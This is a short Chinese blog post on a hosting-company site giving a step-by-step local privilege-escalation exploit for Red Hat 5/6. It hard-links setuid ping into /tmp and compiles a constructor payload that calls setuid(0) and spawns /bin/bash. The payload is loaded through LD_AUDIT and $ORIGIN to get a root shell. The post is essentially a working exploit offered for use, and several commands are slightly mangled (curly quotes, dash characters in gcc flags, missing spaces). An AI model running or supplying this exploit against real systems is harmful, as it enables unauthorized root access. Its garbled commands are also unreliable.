温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Redhat利用漏洞提权

发布时间:2020-07-21 12:41:09 阅读:4600 作者:jikecom 栏目:安全技术
开发者测试专用服务器限时活动,0元免费领,库存有限,领完即止! 点击查看>>

漏洞试用系统:redhat 56通用

.利用/tmp拥有777的权限

/tmp下创建一个exploit目录

ln   /bin/pingping命令的权限很特殊是S,可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限,这里是root

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/

.vim编写一段C语言程序(文件名payload.c

void  __attribute__((constructor))  init()  //这里__是两个下划线

{

         setuid(0);

         system(“/bin/bash”);

}

使用GCC把这个文件编译一下

Gcc -w –fpic –shared –o /tmp/exploit payload.c

.执行

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3

亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI

开发者交流群×